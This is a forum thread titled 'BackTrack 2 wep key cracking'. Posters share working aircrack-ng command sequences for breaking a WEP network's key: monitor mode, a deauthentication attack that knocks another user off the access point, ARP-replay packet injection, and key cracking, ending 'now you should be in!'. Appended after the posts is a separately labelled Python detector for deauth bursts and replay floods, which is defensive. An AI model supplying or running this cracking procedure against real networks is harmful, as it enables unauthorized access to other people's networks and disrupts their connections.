Thursday, April 17, 2014
BackTrack 2 wep key cracking


Guest
Posted on 03-03-08 19:35
I have got BackTrack 2 and I was confused on either the syntax of the commands themselves or if I just didn't configure everything correctly. So to help others, here is what I have. I run iwconfig and set the wireless card to listen (iwconfig wlan0 mode monitor)
next I need to run kismet (when I run kismet it tells me I need to configure it! and to refer to the .doc **I did not know how/or where it was**)
but that's ok, there is an alternative, airodump. So I get it all set up (airodump wlan0 dump channel 1)


-new window-
now I need to inject the packets so I can increase the IVs rapidly.
so I (aireplay -0 10 -1 "MAC address of AP" -c "client MAC address" wlan0) {this was to kick the other user off of the AP and re-authenticate}

-new window-
now to the injection (aireplay -3 -b "MAC address of AP" -h "client MAC address" -x 500 wlan0)

now the numbers should increase
after a while, 500,000 IVs or so later,
time to crack them

-new window-
(aircrack -a 1 -b "MAC address of AP" dump.ivs)
this tells aircrack that it should be trying to break the key
here is another method to use that is sometimes faster
(aircrack -a 1 -i 1 -n 64 -m "MAC address of client" -b "MAC address of AP" dump.ivs)

and now you should get a WEP key; jot it down on a piece of paper, reboot to Windows and enter the key twice without the :
and now you should be in!



(if anyone sees anything I need to add or if there is an error please let me know or edit it, thx Exidous)
PS: I need a sig

Edited by on 03-03-08 19:56

RE: BackTrack 2 wep key cracking


Guest
Posted on 20-06-08 00:33
For you to use kismet on BackTrack you have to edit kismet's conf:
sudo kedit /usr/local/etc/kismet.conf

find the line source=none,none,none
which is source=drivername,devicename,namegiven
for example, mine is, because I use the patched ipwraw drivers:
source=ipw3945,wifi0,Intel

others for example are:
source=ipw3945,eth1,intel
source=orinoco,eth1,kismet
etc.

then kismet will run, and run happy. Lucky you having a card and drivers that inject and enter monitor mode nicely. Few are so fortunate.



RE: BackTrack 2 wep key cracking


Guest
Posted on 20-06-08 01:07
hmm..

I've never had to get 500K IVs to crack a WEP, usually just 50K; I usually go about it kinda like this:

Code
airmon-ng start rausb0

airodump-ng rausb0


I find the target AP, and a client that is on, then I use the client's MAC address in an ARP attack

then I restart airodump to capture the packets I want

Code
airodump-ng --channel 6 -w dumpfile rausb0

then I start the ARP attack

aireplay-ng -3 -b <AP MAC> -h <AP Client's MAC> rausb0


I wait until 50K IVs, then I crack it in less than a few seconds.
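
A defender-side view of the traffic this thread's procedure produces, as an added example that is not part of any post: a burst of deauthentication frames aimed at one client, followed by a high rate of same-length data frames from one station. The frame records, MAC addresses and both thresholds are constructed assumptions, not values from the thread.

```python
from collections import Counter

# Assumed thresholds (per one-second bucket); tune to the monitored network.
DEAUTH_BURST = 5    # deauth frames to one client from one sender
REPLAY_PPS = 100    # identical-length data frames from one station to one AP

# Constructed addresses for the sample below.
AP, STA, OTHER = "00:11:22:33:44:55", "66:77:88:99:aa:bb", "cc:dd:ee:ff:00:11"


def detect(frames):
    """frames: iterable of (time_s, kind, src, dst, length). Returns sorted alerts."""
    deauth = Counter()  # (second, src, dst) -> frame count
    data = Counter()    # (second, src, dst, length) -> frame count
    for ts, kind, src, dst, length in frames:
        sec = int(ts)
        if kind == "deauth":
            deauth[(sec, src, dst)] += 1
        elif kind == "data":
            data[(sec, src, dst, length)] += 1
    alerts = set()
    # Deauth frames carry the AP's address as sender whoever sent them,
    # so the signal is the rate toward one client, not the source.
    for (sec, src, dst), n in deauth.items():
        if n >= DEAUTH_BURST:
            alerts.add(("deauth-burst", sec, src, dst))
    # A replayed frame keeps its length; normal traffic varies in size.
    for (sec, src, dst, _length), n in data.items():
        if n >= REPLAY_PPS:
            alerts.add(("replay-flood", sec, src, dst))
    return sorted(alerts)


def sample_frames():
    """Constructed capture: ordinary traffic, a deauth burst, then a replay flood."""
    frames = [(i / 10, "data", OTHER, AP, 100 + 37 * (i % 9)) for i in range(40)]
    frames += [(4 + i / 100, "deauth", AP, STA, 26) for i in range(10)]
    frames += [(6 + i / 500, "data", STA, AP, 68) for i in range(1000)]
    return frames


if __name__ == "__main__":
    for alert in detect(sample_frames()):
        print(alert)
```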